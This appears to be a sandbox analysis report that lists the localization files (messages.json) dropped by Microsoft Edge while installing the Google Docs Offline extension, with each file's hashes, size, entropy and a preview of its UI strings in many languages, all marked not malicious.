Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
